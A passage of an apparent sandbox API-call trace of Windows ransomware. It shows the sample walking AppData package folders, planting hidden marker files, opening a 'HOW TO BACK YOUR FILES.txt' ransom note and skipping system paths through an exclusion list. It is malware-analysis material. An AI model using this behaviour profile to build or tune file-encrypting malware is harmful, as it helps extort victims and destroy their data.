[0056.132] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0056.132] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData" [0056.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118f48 | out: hHeap=0xe0000) returned 1 [0056.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0056.132] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData" [0056.132] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\" [0056.132] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0056.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.134] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.137] FlushFileBuffers (hFile=0x27c) returned 1 [0056.138] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.138] CloseHandle (hObject=0x27c) returned 1 [0056.139] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData") returned 81 [0056.139] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.139] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d33caa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeac934e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0056.139] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.139] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.139] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.139] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.139] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d33caa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeac934e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.139] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.139] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.140] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.140] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.140] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.140] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeac934e8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeac934e8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac9c811, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.140] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.140] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.140] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeac934e8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeac934e8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac9c811, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.140] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0056.140] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.140] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.140] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.140] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.141] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.141] CloseHandle (hObject=0x278) returned 1 [0056.141] CloseHandle (hObject=0x27c) returned 1 [0056.141] GetCurrentThreadId () returned 0xd98 [0056.141] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0056.141] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC" [0056.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120c90 | out: hHeap=0xe0000) returned 1 [0056.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0056.141] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC" [0056.141] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\" [0056.141] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0056.141] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.142] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.144] FlushFileBuffers (hFile=0x27c) returned 1 [0056.145] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.145] CloseHandle (hObject=0x27c) returned 1 [0056.146] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC") returned 76 [0056.146] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.146] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d33442, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaca165f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0056.146] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.146] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.146] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.146] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.146] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d33442, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaca165f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.147] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.147] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.147] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.147] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.147] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.147] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaca165f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaca165f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeacae2f0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.147] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.147] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.147] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaca165f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaca165f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeacae2f0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.147] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0056.147] lstrcpyW (in: lpString1=0x130ebd2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.147] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.147] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.147] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.148] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.148] CloseHandle (hObject=0x278) returned 1 [0056.148] CloseHandle (hObject=0x27c) returned 1 [0056.148] GetCurrentThreadId () returned 0xd98 [0056.148] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0056.148] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy" [0056.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117e18 | out: hHeap=0xe0000) returned 1 [0056.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0056.148] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy" [0056.148] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\" [0056.148] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0056.148] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.152] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.155] FlushFileBuffers (hFile=0x27c) returned 1 [0056.156] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.156] CloseHandle (hObject=0x27c) returned 1 [0056.157] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy") returned 82 [0056.157] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.157] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b315bfa, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd8832b29, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeacbde73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0056.157] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.157] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.157] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.157] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.157] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b315bfa, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd8832b29, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeacbde73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.157] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.157] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.157] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.157] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.157] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.157] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeacbde73, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeacbde73, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeacc7ac5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.157] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.157] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.157] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8a6d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9b33bde5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0056.157] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.157] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.158] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0056.158] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0056.158] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0056.158] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0056.158] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0056.158] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0056.158] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0056.158] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0056.158] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0056.158] lstrcpyW (in: lpString1=0x130ebde, lpString2="AC" | out: lpString1="AC") returned="AC" [0056.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0056.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123e00 [0056.158] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122248 [0056.158] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8acf2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9b33bde5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0056.158] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0056.158] lstrcpyW (in: lpString1=0x130ebde, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0056.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0056.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x123760 [0056.158] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x1220c8 [0056.159] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8b2eb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9b33bde5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0056.159] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0056.159] lstrcpyW 